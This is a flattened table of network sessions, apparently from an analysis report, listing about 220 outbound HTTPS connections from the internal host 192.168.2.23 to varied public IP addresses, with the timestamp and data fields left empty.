                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20585192.168.2.234726677.33.98.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20586192.168.2.2345860102.13.5.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20587192.168.2.2352216207.156.190.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20588192.168.2.235955697.216.233.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20589192.168.2.234491292.164.153.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20590192.168.2.2358950175.49.24.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20591192.168.2.2341548147.185.5.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20592192.168.2.233318019.154.118.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20593192.168.2.233307262.82.190.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20594192.168.2.234829423.86.164.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20595192.168.2.233713886.143.202.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20596192.168.2.234209685.249.160.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20597192.168.2.2353346201.69.108.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20598192.168.2.2358578145.169.72.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20599192.168.2.234857636.154.176.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20600192.168.2.234860458.144.202.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20601192.168.2.2359496104.148.80.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20602192.168.2.235532091.36.138.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20603192.168.2.2349104194.184.63.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20604192.168.2.235550092.197.45.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20605192.168.2.2347342146.213.109.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20606192.168.2.234365424.11.131.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20607192.168.2.233823484.9.64.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20608192.168.2.23592042.15.98.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20609192.168.2.2346666200.155.78.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20610192.168.2.235011487.45.169.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20611192.168.2.2339884111.159.218.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20612192.168.2.2341746178.245.91.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20613192.168.2.2354152107.12.220.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20614192.168.2.235793825.109.12.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20615192.168.2.2351048136.53.191.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20616192.168.2.2335560112.34.235.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20617192.168.2.2353904136.118.213.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20618192.168.2.23392548.98.234.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20619192.168.2.234025072.1.73.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20620192.168.2.2356636201.239.186.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20621192.168.2.2345490156.140.176.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20622192.168.2.2341832188.242.4.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20623192.168.2.2338052131.186.124.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20624192.168.2.2344586189.251.229.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20625192.168.2.2350384218.94.215.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20626192.168.2.2340208114.80.226.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20627192.168.2.2341328149.203.219.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20628192.168.2.235517245.156.240.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20629192.168.2.2346290140.77.234.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20630192.168.2.233755461.132.161.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20631192.168.2.2345964218.238.59.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20632192.168.2.2339090161.133.193.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20633192.168.2.2350446205.58.186.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20634192.168.2.2339348175.163.10.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20635192.168.2.2350876140.240.32.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20636192.168.2.2336864176.212.110.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20637192.168.2.2337746178.171.167.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20638192.168.2.2350016160.184.188.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20639192.168.2.236055625.123.238.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20640192.168.2.2348156173.213.130.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20641192.168.2.235209460.146.193.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20642192.168.2.234523036.26.143.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20643192.168.2.2357482168.202.165.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20644192.168.2.234776813.63.79.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20645192.168.2.2334052197.126.169.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20646192.168.2.2334338123.95.17.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20647192.168.2.233337459.17.6.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20648192.168.2.234173489.14.255.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20649192.168.2.2350780193.4.144.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20650192.168.2.2360078206.127.166.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20651192.168.2.235145459.255.132.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20652192.168.2.2347442184.254.7.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20653192.168.2.2339872157.129.60.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20654192.168.2.2340836164.6.25.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20655192.168.2.2337480162.90.2.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20656192.168.2.235817888.233.178.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20657192.168.2.2359444163.111.46.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20658192.168.2.2358736188.168.10.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20659192.168.2.2338780142.146.74.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20660192.168.2.2339812137.221.154.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20661192.168.2.234650081.63.70.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20662192.168.2.2333306128.60.164.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20663192.168.2.2337378223.212.32.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20664192.168.2.235060041.89.12.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20665192.168.2.2347054109.209.84.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20666192.168.2.233653895.162.167.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20667192.168.2.2357692116.149.182.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20668192.168.2.2343518112.171.3.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20669192.168.2.2339598177.39.91.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20670192.168.2.2341058217.63.150.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20671192.168.2.233301868.190.243.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20672192.168.2.2350422159.57.69.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20673192.168.2.2351268193.54.44.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20674192.168.2.235291052.113.34.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20675192.168.2.235662862.138.220.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20676192.168.2.2342308217.79.30.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20677192.168.2.2337874124.91.179.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20678192.168.2.2350870131.26.227.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20679192.168.2.2334988111.100.217.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20680192.168.2.233809669.138.151.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20681192.168.2.2343104159.202.27.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20682192.168.2.233625676.103.153.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20683192.168.2.234464413.84.59.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20684192.168.2.2360540140.23.90.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20685192.168.2.235550650.250.62.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20686192.168.2.2336204188.11.160.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20687192.168.2.2357650156.62.124.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20688192.168.2.233951032.57.59.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20689192.168.2.235618050.134.74.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20690192.168.2.235344477.122.234.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20691192.168.2.23527604.112.137.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20692192.168.2.234152448.156.34.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20693192.168.2.2358062131.121.107.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20694192.168.2.2351484208.245.60.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20695192.168.2.235143693.49.34.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20696192.168.2.2358958158.195.250.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20697192.168.2.234379479.135.110.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20698192.168.2.2335140202.254.218.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20699192.168.2.233723498.218.43.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20700192.168.2.2360888132.189.121.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20701192.168.2.2348448207.136.98.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20702192.168.2.235641269.189.1.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20703192.168.2.235550850.84.2.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20704192.168.2.233678285.103.219.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20705192.168.2.2349530152.233.26.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20706192.168.2.2353462182.211.38.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20707192.168.2.233962682.39.109.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20708192.168.2.235930227.208.135.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20709192.168.2.233277684.41.97.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20710192.168.2.2350040169.1.173.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20711192.168.2.234993846.252.169.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20712192.168.2.2356706203.241.15.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20713192.168.2.233345259.106.42.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20714192.168.2.2346936175.227.199.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20715192.168.2.2340768140.74.140.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20716192.168.2.2358538171.169.233.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20717192.168.2.233398097.182.192.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20718192.168.2.2334986115.117.31.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20719192.168.2.2356542128.181.95.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20720192.168.2.2333258123.172.241.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20721192.168.2.234375446.160.23.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20722192.168.2.23554662.154.89.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20723192.168.2.233411679.217.80.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20724192.168.2.2338592156.47.74.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20725192.168.2.235279023.147.149.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20726192.168.2.235742065.174.233.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20727192.168.2.2335664110.21.109.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20728192.168.2.2353854145.1.104.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20729192.168.2.2336144123.9.187.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20730192.168.2.234650851.208.212.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20731192.168.2.2349542149.12.133.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20732192.168.2.235733249.110.156.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20733192.168.2.2358938158.78.226.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20734192.168.2.2334830203.112.45.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20735192.168.2.2356558222.130.109.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20736192.168.2.2360252182.113.81.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20737192.168.2.2346314174.142.132.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20738192.168.2.2358442113.194.61.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20739192.168.2.2345414193.213.59.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20740192.168.2.2341026177.17.178.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20741192.168.2.2333796102.129.58.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20742192.168.2.234407891.131.41.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20743192.168.2.233722272.113.241.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20744192.168.2.234853649.154.27.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20745192.168.2.233520240.9.233.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20746192.168.2.235831276.180.128.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20747192.168.2.2351068116.96.43.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20748192.168.2.2344630204.188.67.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20749192.168.2.234688842.172.217.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20750192.168.2.2358072118.178.111.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20751192.168.2.2344658183.0.145.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20752192.168.2.2355162197.60.175.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20753192.168.2.234057664.55.56.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20754192.168.2.234440031.12.21.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20755192.168.2.23571249.44.58.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20756192.168.2.235690227.98.231.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20757192.168.2.235084494.58.193.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20758192.168.2.235557427.94.0.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20759192.168.2.2353174116.46.92.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20760192.168.2.2352030129.139.168.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20761192.168.2.234608296.28.221.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20762192.168.2.2348360203.102.196.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20763192.168.2.2337284143.190.76.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20764192.168.2.2336250184.156.113.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20765192.168.2.2350452102.34.146.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20766192.168.2.233635631.130.182.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20767192.168.2.2337540171.175.220.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20768192.168.2.2349260110.131.36.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20769192.168.2.2340408111.214.168.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20770192.168.2.2337958182.208.188.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20771192.168.2.2346732117.156.197.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20772192.168.2.2358592173.44.117.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20773192.168.2.2341412109.15.89.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20774192.168.2.2340562113.68.9.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20775192.168.2.2352650196.16.131.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20776192.168.2.234987825.41.255.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20777192.168.2.2359288194.75.218.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20778192.168.2.235704648.67.226.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20779192.168.2.235893881.170.72.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20780192.168.2.233646689.17.151.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20781192.168.2.2339690164.79.175.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20782192.168.2.23515329.66.10.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20783192.168.2.2345184165.162.132.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20784192.168.2.2335518123.200.16.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20785192.168.2.2354310167.1.147.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20786192.168.2.233865297.181.120.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20787192.168.2.2342986156.55.85.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20788192.168.2.2342370165.153.229.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20789192.168.2.2337616157.119.22.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20790192.168.2.236063031.174.52.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20791192.168.2.2351774199.2.235.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20792192.168.2.234048296.126.11.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20793192.168.2.2346440180.164.97.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20794192.168.2.233940845.239.191.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20795192.168.2.2352686160.115.52.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20796192.168.2.2349678187.77.23.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20797192.168.2.2359422123.146.252.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20798192.168.2.2343882108.102.33.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20799192.168.2.234886287.253.188.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20800192.168.2.2342592163.21.34.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20801192.168.2.2336786175.235.152.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20802192.168.2.233902468.206.16.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20803192.168.2.2341866220.141.120.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20804192.168.2.234045287.86.9.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20805192.168.2.235882475.137.142.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20806192.168.2.2353118186.38.50.166443
